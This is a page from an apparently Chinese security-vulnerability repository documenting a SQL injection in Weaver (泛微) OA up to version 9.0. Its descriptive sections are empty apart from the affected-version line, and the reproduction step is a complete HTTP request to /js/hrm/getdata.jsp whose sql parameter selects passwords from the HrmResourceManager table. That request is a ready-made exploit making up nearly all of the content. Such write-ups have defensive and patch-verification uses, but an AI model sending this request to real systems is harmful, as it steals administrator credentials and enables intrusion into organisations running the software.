menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 泛微OA =9.0 sql注入漏洞 chevron_right 泛微OA =9.0 sql注入漏洞.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    泛微OA =9.0 sql注入漏洞.md
    722 B / 2021-07-15 20:14:28
        泛微OA \< =9.0 sql注入漏洞
==========================

一、漏洞简介
------------

二、漏洞影响
------------

泛微OA \< =9.0

三、复现过程
------------

    GET //js/hrm/getdata.jsp?cmd=getSelectAllid&sql=select%20password%20as%20id%20from%20HrmResourceManager HTTP/1.1
    Host: www.0-sec.org
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie:
    Connection: close
    links
    file_download